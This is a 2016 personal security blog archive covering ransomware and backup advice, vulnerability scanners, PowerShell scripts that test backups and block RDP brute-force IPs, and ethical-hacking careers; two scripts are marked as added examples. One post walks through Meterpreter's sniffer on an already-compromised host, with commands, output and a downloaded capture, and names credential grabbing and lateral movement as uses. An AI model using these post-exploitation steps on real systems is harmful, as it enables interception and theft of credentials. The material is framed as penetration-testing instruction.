Friday, October 7, 2016

Small Business Protection Against Ransomware

There are a lot of systems that can help you protect against ransomware, and which ones you buy is up to your budget. Normally a small business does not have the resources for systems that detect threats in email, web filtering on every machine, a firewall appliance, etc.

Here are a few things that normally help small companies fight ransomware:

  1. Backup - Yes, backup is not expensive, and you have options: one kind backs up only selected files from your shared folders, the other backs up a full image of the server. Choose depending on your needs and requirements. In my case I would recommend an image backup of your server or workstation: one full backup plus incremental backups. Shadow Protect is a good option.
  2. A good antivirus. One I like a lot is Webroot: low on resources and it fights ransomware pretty well. It protects you especially while you are on the internet.
  3. Run Windows updates. Your system needs to be patched, and so does all your other software, such as Java.
  4. Common sense. Yes, this is very important: be careful where you go on the internet and which files you open when somebody sends you one by email. Normally I do not open a file I did not ask for, even if it comes from my mother.
If you do the math, you will spend money on only two things: a backup solution and an antivirus. I would not go with a free backup; you need something automatic that runs unattended. Set Windows updates to automatic, pay attention to what you do on your computer, and read the alerts Windows or the antivirus shows you when there is a risk.

Tuesday, March 15, 2016

Are Vulnerability scanners broken?

Automated vulnerability scanners produce a lot of false positives, which creates a lot of work for security analysts, and some of them hate the tools. Are vulnerability scanners broken?

Not necessarily. Automated vulnerability scanners still provide a lot of help identifying weaknesses in a system or OS, and they are cheaper than a penetration test.

Security is an ongoing process. An automated scanner helps raise the security bar of any system, but it should not replace penetration testing. After you have been running the automated tool for a while, bring in a penetration tester. The pentester can focus on the harder weaknesses because you already found the easy ones with the vulnerability scanner.

So, are vulnerability scanners broken? No, they keep helping to protect the data.

Thursday, March 3, 2016

A good backup makes the day

How is it possible that so many companies work without a good backup? The risk is high. Very often, at the moment you least expect it, you get hit, and then the only solution you have is to restore from backup.

Here are some examples:

1. A user is surfing the internet and hits a site that infects his or her machine with crypto-locker malware. Terrible: it begins to encrypt every network drive mapped on that computer, and some of these malware families also encrypt the shadow copies. You have two options: restore from backup or pay the ransom.

2. This one is very common: users show up at 7:30 a.m. and the accounting or file server is not working. You go and check and discover the hard drive is failing, or the whole OS is corrupted including the data, etc. Especially with a hardware failure, you need to restore from backup.

In the previous examples, what happens if you do not have a backup? Prepare your resume; very soon you will be looking for a job, and the company will lose money.

Now, what happens if you do have a backup? You are happy and begin to restore the data or the server, and then discover the backup is not working right and you cannot restore anything. Nobody ever tested the backups.

Now we can say: Houston, we have a problem!

I saw other companies that lost between 30 GB and 1 TB of data and restored it in a couple of hours, very quickly. Good. Why? Because they implemented a good backup solution according to their needs.

Types of backups: image or files.

Not all backups are the same; it depends on many factors. If you have servers that need to restore complex applications, then you need a backup that creates images of the machine.

File servers are different: you just need to back up the files or data, so if the files become corrupted, encrypted or deleted you can restore them very easily, even during production hours.

There are different strategies to protect company data or servers in case of disaster. You know your company and environment; as people say: choose wisely!
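The point that hurts most above is "nobody ever tested the backups". For the file-backup case (and the backup item in the ransomware post above), a restore test does not have to be a full restore: a scheduled script that compares a sample of source files with their copies in the backup folder catches a job that stopped running, a copy that got corrupted, or a backup that already contains encrypted files. The script below is an added example, not from the original post or any backup product; the folder paths, sample size and 24-hour "recent files" window are assumptions, and the demo data at the bottom is constructed so it runs on any Windows machine with PowerShell 4.0 or later.

```powershell
# Test-BackupSample.ps1 (added example, not from the original post).
# Spot-checks that a file backup is restorable by comparing SHA-256 hashes of a
# sample of source files with their copies in the backup folder. Folder paths,
# sample size and the "recent files" window are assumptions for the demo.
# Requires PowerShell 4.0 or later (Get-FileHash).

function Test-BackupSample {
    param(
        [Parameter(Mandatory)] [string] $SourceRoot,   # the share the users work on
        [Parameter(Mandatory)] [string] $BackupRoot,   # where the backup job writes its copies
        [int] $RandomSample = 25,                      # random files to spot-check
        [int] $RecentHours  = 24                       # every file changed in this window must be in the backup
    )

    $srcRoot = (Resolve-Path -LiteralPath $SourceRoot).Path.TrimEnd('\')
    $all     = @(Get-ChildItem -LiteralPath $srcRoot -Recurse -File)
    if ($all.Count -eq 0) { throw "No files under $srcRoot" }

    # Random files catch corrupt or encrypted copies; recently changed files
    # catch a job that silently stopped running (a stale backup looks fine
    # until you need yesterday's work).
    $recent = @($all | Where-Object { $_.LastWriteTime -gt (Get-Date).AddHours(-$RecentHours) })
    $random = @($all | Get-Random -Count ([Math]::Min($RandomSample, $all.Count)))
    $sample = @(($recent + $random) | Sort-Object FullName -Unique)

    $problems = @(foreach ($f in $sample) {
        $rel  = $f.FullName.Substring($srcRoot.Length).TrimStart('\')
        $copy = Join-Path $BackupRoot $rel
        if (-not (Test-Path -LiteralPath $copy -PathType Leaf)) {
            [pscustomobject]@{ File = $rel; Problem = 'missing in backup' }
            continue
        }
        $srcHash = (Get-FileHash -LiteralPath $f.FullName -Algorithm SHA256).Hash
        $bakHash = (Get-FileHash -LiteralPath $copy      -Algorithm SHA256).Hash
        if ($srcHash -ne $bakHash) {
            [pscustomobject]@{ File = $rel; Problem = 'content differs (stale, corrupt or encrypted copy)' }
        }
    })

    [pscustomobject]@{
        Checked  = $sample.Count
        Problems = $problems
        Passed   = ($problems.Count -eq 0)
    }
}

# --- Constructed demo data: a stand-in for a real share and its backup ---
$demo   = Join-Path $env:TEMP ('backuptest-' + [guid]::NewGuid())
$source = Join-Path $demo 'share'
$backup = Join-Path $demo 'backup'
New-Item -ItemType Directory -Path $source, $backup | Out-Null
1..30 | ForEach-Object { Set-Content -Path (Join-Path $source "doc$_.txt") -Value "invoice $_" }
Copy-Item -Path "$source\*" -Destination $backup -Recurse

# Three failure modes the test should surface:
Set-Content -Path (Join-Path $source 'doc1.txt') -Value 'edited after the backup ran'   # stale copy
Set-Content -Path (Join-Path $backup 'doc2.txt') -Value 'ciphertext'                    # corrupt/encrypted copy
Remove-Item -Path (Join-Path $backup 'doc3.txt')                                        # never copied

$result = Test-BackupSample -SourceRoot $source -BackupRoot $backup -RandomSample 30
$result.Problems | Format-Table -AutoSize
"Checked $($result.Checked) files; passed: $($result.Passed)"
Remove-Item -Path $demo -Recurse -Force
```

Run it from a scheduled task after the backup job and alert on Passed being false. It is deliberately a sample, not a full comparison: hashing a few dozen files every night is cheap, hashing a terabyte is not. It only covers file backups; for image backups the equivalent test is booting the image in a VM, which no script of this size replaces.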

Sunday, February 28, 2016

Basic PowerShell script to block IP addresses during a dictionary attack on Remote Desktop

Several times you check the Security log and notice some IP addresses are trying to guess a username and password for Remote Desktop (RDP).

This script is for Windows 2008/2008 R2 and Windows 7.

Because we want to block and stop those attacks, a lot of security analysts block the IP address in the firewall (Windows or an appliance). That is good, but there is a big chance another IP will show up attacking while the analyst is sleeping or doing something else.

This script reads the Windows Security log looking for event ID 4625 (failed logon) in the last 5 minutes, strips the rest of the log information and duplicate IP addresses, and at the end writes the IP addresses into the Windows Firewall as block rules. The block applies to the whole IP, not just the RDP port.

The next time the script runs it deletes all the IP addresses it wrote into the firewall and starts the process again. Note that this also means an attacker is unblocked on the next run unless the 5-minute window still contains failures from that IP; a blocked IP cannot produce new failed logons, so in practice a block lasts one cycle.

If there are no new IP addresses to add, the script ends.

This script is basic. No port is involved, just IP addresses, and if a legitimate user types a wrong password even once, his or her IP will be blocked the next time the script runs. Events whose Source Network Address is "-" (no network source recorded) are dropped.

To run the script every 5 minutes, create a scheduled task on the Windows machine that runs it every 5 minutes.

If you want to copy the script, paste it into Notepad first to make sure the code is clean; otherwise you will get errors and end up troubleshooting.

If you need custom code, please contact me and I will be glad to help you for a small fee.

This is the script:


### Remove the rules created by the previous run so the list is rebuilt from scratch
netsh advfirewall firewall delete rule name="Block IP Attacker"

### Failed logons (event ID 4625) in the last 5 minutes. Change -5 to use another window.
Get-EventLog -LogName Security -After (Get-Date).AddMinutes(-5) | Where-Object {$_.EventID -eq 4625} | Format-List message | Out-File result.txt

### Keep only the "Source Network Address:" lines
Get-Content result.txt | Select-String -Pattern "Source Network Address:" | Out-File result2.txt

### Clean the output: drop the label, the "-" placeholder (no network source) and blank lines
Get-Content result2.txt | ForEach-Object {$_ -replace "Source Network Address:", ""} | ForEach-Object {$_ -replace "-", ""} | Out-File result3.txt
Get-Content result3.txt | ForEach-Object {$_.Trim()} | Out-File result4.txt
Get-Content result4.txt | Where-Object {$_ -ne ""} > result5.txt

### Remove duplicate addresses
Get-Content result5.txt | Sort-Object | Get-Unique | Out-File result6.txt
Get-Content result6.txt | Where-Object {$_ -ne ""} > iptoblock.txt
Get-Content iptoblock.txt

### If nothing was found, exit and print "No New Incidents, I will sleep waiting for new attacks";
### otherwise add one block rule per address (whole IP, all ports)
$c = Get-Content iptoblock.txt
if (-not $c) {
    Write-Host "No New Incidents, I will sleep waiting for new attacks"
    exit
}

foreach ($ip in $c) {
    netsh advfirewall firewall add rule name="Block IP Attacker" dir=in interface=any action=block remoteip="$ip"
}

### Tells you the script finished; you can comment this line out
Write-Host "WORK DONE"

End of the script.
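The same idea, hardened in the three ways you will want before scheduling it: an IP is blocked only after a number of failures in the window, so one mistyped password does not lock a user out; an allow-list protects management addresses; and blocked IPs are remembered in a state file for a fixed time, so a block survives the next run instead of being dropped as soon as the attacker goes quiet. It reads the 4625 events with Get-WinEvent and takes the address from the event's IpAddress field instead of parsing the formatted text. This is an added example, not the original script; the threshold, rule name, allow-list (192.0.2.10 stands in for your admin PC), block duration and state-file path are assumptions. It uses only PowerShell 2.0 cmdlets and netsh, so it runs on Windows 7/2008 R2, and it must run elevated.

```powershell
# Block-RdpAttackers.ps1 (added example, not the original script). Assumptions:
# threshold, rule name, allow-list, block duration and state-file path below.
param(
    [int]      $Minutes    = 5,          # look-back window, same as the original script
    [int]      $Threshold  = 5,          # failed logons per IP before it is blocked
    [int]      $BlockHours = 24,         # how long a block is remembered
    [string]   $RuleName   = 'Block RDP Attacker',
    [string[]] $AllowList  = @('127.0.0.1', '::1', '192.0.2.10'),   # never block these; 192.0.2.10 is a placeholder admin IP
    [string]   $StateFile  = (Join-Path $env:ProgramData 'rdp-blocklist.csv')
)

# 1. Failed logons (4625) in the window. Properties[19] of a 4625 event is the
#    IpAddress field ("Source Network Address" in the formatted message); '-'
#    means no network source was recorded and is skipped.
$since  = (Get-Date).AddMinutes(-$Minutes)
$events = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625; StartTime = $since } -ErrorAction SilentlyContinue)
$newOffenders = @($events |
    ForEach-Object { [string]$_.Properties[19].Value } |
    Where-Object { $_ -and $_ -ne '-' -and $AllowList -notcontains $_ } |
    Group-Object |
    Where-Object { $_.Count -ge $Threshold } |
    ForEach-Object { $_.Name })

# 2. Merge with the blocks remembered from earlier runs, dropping expired ones,
#    so an attacker stays blocked even though a blocked IP can no longer
#    generate new 4625 events.
$now   = Get-Date
$state = @()
if (Test-Path -LiteralPath $StateFile) {
    $state = @(Import-Csv -Path $StateFile |
        Where-Object { ([datetime]$_.BlockedAt).AddHours($BlockHours) -gt $now })
}
foreach ($ip in $newOffenders) {
    $known = $state | Where-Object { $_.Ip -eq $ip }
    if ($known) { $known.BlockedAt = $now.ToString('o') }   # repeat offender: restart its clock
    else        { $state += New-Object PSObject -Property @{ Ip = $ip; BlockedAt = $now.ToString('o') } }
}
if ($state.Count -gt 0) { $state | Export-Csv -Path $StateFile -NoTypeInformation }
elseif (Test-Path -LiteralPath $StateFile) { Remove-Item -LiteralPath $StateFile }

# 3. Rebuild a single firewall rule from the full list (netsh accepts a
#    comma-separated remoteip list) instead of one rule per address.
netsh advfirewall firewall delete rule name="$RuleName" | Out-Null
$blockList = @($state | ForEach-Object { $_.Ip })
if ($blockList.Count -eq 0) {
    Write-Host "No IP reached $Threshold failed logons in the last $Minutes minutes; nothing to block."
    return
}
$remoteIps = $blockList -join ','
netsh advfirewall firewall add rule name="$RuleName" dir=in action=block remoteip="$remoteIps" | Out-Null
Write-Host "Blocking $($blockList.Count) address(es): $remoteIps"
```

Schedule it as SYSTEM every 5 minutes, for example (the script path is an assumption): schtasks /create /tn "Block RDP Attackers" /sc minute /mo 5 /ru SYSTEM /rl HIGHEST /tr "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Block-RdpAttackers.ps1". Two caveats remain: the block is still per IP and not per port, so an attacker behind the same NAT address as legitimate users will take them down with it, and an attacker who rotates addresses or stays below the threshold is not caught; the real fix for internet-facing RDP is to put it behind a VPN or gateway and use strong passwords, with this script as a backstop.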
Monday, January 18, 2016

Packet sniffing with Metasploit Meterpreter

Meterpreter lets you run a packet sniffer through an extension, and something very important is that the captured traffic is never written to the target's hard drive. I will explain how to enable the packet sniffer in Metasploit's Meterpreter:

Let's assume you already have a session from some exploit with Meterpreter running; then you type the following:

### Load the sniffer extension

meterpreter > use sniffer

Loading extension sniffer...success.

meterpreter > ?


Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

### Check which interfaces are available to sniff on

meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

### Interface 2 is the network card; we start capturing on it:

meterpreter > sniffer_start 2

[*] Capture started on interface 2 (50000 packet buffer)

### Stop the sniffer

meterpreter > sniffer_stop 2

[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

### Download the captured data

meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap

Then I was able to open raul.pcap in Wireshark.

Where can you use this? To grab credentials and move laterally on the network if you are pentesting it, or to troubleshoot a computer problem on the network.

Friday, January 15, 2016

I want to be an ethical hacker

A lot of people want to be ethical hackers or penetration testers. It is a very rewarding job and it also requires a lot of effort. In this article I will describe what knowledge you need to be an ethical hacker. I will not touch on the soft skills, only the technical ones.

First, this is not an easy path. It requires perseverance and a lot of self-study, including thinking completely differently from any other technical role (outside the box).

Basic Knowledge

Yes, you need basic knowledge, and it has to be very solid; you do not have the luxury of holes in your basic knowledge.

Knowledge of the Windows and Linux OS: you have to be strong in one of them and very proficient in the other. I am not saying you must be able to build a cluster with those servers; I mean the knowledge you would have as a system admin or system engineer working for an IT services company (yes, working for an IT company is very different from working for a single company).

Network knowledge: yes, you have to know how routing works, TCP/UDP, packets, routers, switches, ARP, firewalls, etc. How will you bypass a firewall if you do not know how it works, or sniff traffic if you do not understand switches?

Programming knowledge: you need one language in which you are strong, and if you are going into web ethical hacking you need more than one. A lot of hackers use Perl and Python.

Specialty Knowledge

This depends on what you want to be good at; you cannot be strong in every specialty, with some exceptions. These are some examples:

Specialty: attacking networks. For this you need good knowledge of protocols, routers, switches, firewalls, Wi-Fi, packets, etc.

Specialty: attacking systems. This includes a lot of networking, because you use packets, etc., plus good knowledge of Windows/Linux and how to escalate privileges to become an administrator on the server or the domain.

Specialty: attacking web applications. Here you need knowledge of different web programming languages like ASP, PHP, Java, etc. You also need good database knowledge; yes, how will you attempt SQL injection when you do not know anything about SQL queries?


A lot of ethical hackers have a mix of skills. They are normally strong in one specialty and a little weaker in the others. In the beginning, do not worry about which skills you will end up with. Start building your skills and later you will find which of these fields you want to be in and go for it. Enjoy the whole process.

Tuesday, January 12, 2016

Pentest (or hack) your way into your new Security Analyst job

You get a phone call about a Security Analyst position in your area. You are excited; you have been applying for that kind of position, and now you have their attention and a first phone interview. What will you do?

You need to follow the same steps a hacker does when attacking a company. Let's check:

Phase 1 - Reconnaissance

Yes, you need to gather information about the company and the person or people who will do the first phone interview. Surely the recruiter will tell you their name(s) and the time.

With the name(s) and the company name you begin to research. The first thing is the company website: you need to know what the company does and what it means, inside and out, including which positions are available, the requirements, etc.

Now, with the interviewer's name, find everything possible: check LinkedIn, Google+, Facebook, etc. Yes, sometimes you can find on the internet where he or she lives and what sport he or she plays. The better you know that person, the better your chance to connect.

Phase 2- Scanning

During the phone interview you have the chance to send a few packets: you can ask questions about the position, the requirements and the environment. Ask interesting questions, and prepare them before the phone interview. Do not ask uncomfortable questions; you do not want to crash your target.

Phase 3 - Gaining Access

This is the face-to-face interview. Here you get to send your exploits: show them who you are, your technical skills and your non-technical skills, like good communication. Show them that the ideal person for the Security Analyst position is YOU.

Remember, in this phase you are still discovering. Now you need to scan a little more: ask more questions, and remember not to crash the server; you do not want a denial of service (DoS).

Phase 4 - Maintaining Access

In this phase, after the phone and face-to-face interviews, send an email summarizing what you took from the interview, showing you are interested in the position, and leaving the door open for more questions from them. Maintain your access.

Phase 5 - Covering Tracks

If you got the position, CONGRATULATIONS! If not, you got a lot of experience from this pentest and you will nail the next one; remember, pentesters have to be the masters. Also, when you did not get the position, send a thank-you email for the interview; who knows, they may keep you in mind and change their decision.

If you look at your job search like a penetration testing process, first you will enjoy it, and second you will increase your confidence and your success.

Keep going and enjoy the process.
